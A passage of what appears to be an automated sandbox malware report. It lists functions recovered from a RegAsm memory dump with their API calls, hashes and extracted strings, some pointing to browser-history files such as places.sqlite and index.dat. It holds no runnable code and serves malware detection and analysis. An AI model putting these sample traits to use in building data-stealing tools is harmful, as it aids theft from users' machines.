                                                                • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID:
                                                                • API String ID: 613200358-0
                                                                • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset
                                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                • API String ID: 2221118986-1725073988
                                                                • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@DeleteObject
                                                                • String ID: r!A
                                                                • API String ID: 1103273653-628097481
                                                                • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??2@
                                                                • String ID:
                                                                • API String ID: 1033339047-0
                                                                • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$memcmp
                                                                • String ID: $$8
                                                                • API String ID: 2808797137-435121686
                                                                • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                  • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                  • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                • String ID:
                                                                • API String ID: 1979745280-0
                                                                • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                Function 00414C2E Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                • memset.MSVCRT ref: 00414C87
                                                                • wcscpy.MSVCRT ref: 00414CFC
                                                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                Strings
                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressProcVersionmemsetwcscpy
                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                • API String ID: 4182280571-2036018995
                                                                • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                • memset.MSVCRT ref: 00403A55
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                • String ID: history.dat$places.sqlite
                                                                • API String ID: 2641622041-467022611
                                                                • Opcode ID: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                • Opcode Fuzzy Hash: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                • GetLastError.KERNEL32 ref: 00417627
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$File$PointerRead
                                                                • String ID:
                                                                • API String ID: 839530781-0
                                                                • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FileFindFirst
                                                                • String ID: *.*$index.dat
                                                                • API String ID: 1974802433-2863569691
                                                                • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                • GetLastError.KERNEL32 ref: 004175A2
                                                                • GetLastError.KERNEL32 ref: 004175A8
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$FilePointer
                                                                • String ID:
                                                                • API String ID: 1156039329-0
                                                                • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$CloseCreateHandleTime
                                                                • String ID:
                                                                • API String ID: 3397143404-0
                                                                • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Temp$DirectoryFileNamePathWindows
                                                                • String ID:
                                                                • API String ID: 1125800050-0
                                                                • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CloseHandleSleep
                                                                • String ID: }A
                                                                • API String ID: 252777609-2138825249
                                                                • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • malloc.MSVCRT ref: 00409A10
                                                                • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                • free.MSVCRT ref: 00409A31
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: freemallocmemcpy
                                                                • String ID:
                                                                • API String ID: 3056473165-0
                                                                • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: d
                                                                • API String ID: 0-2564639436
                                                                • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset
                                                                • String ID: BINARY
                                                                • API String ID: 2221118986-907554435
                                                                • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _wcsicmp
                                                                • String ID: /stext
                                                                • API String ID: 2081463915-3817206916
                                                                • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                • String ID:
                                                                • API String ID: 2445788494-0
                                                                • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                • String ID:
                                                                • API String ID: 3150196962-0
                                                                • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                Memory Dump Source
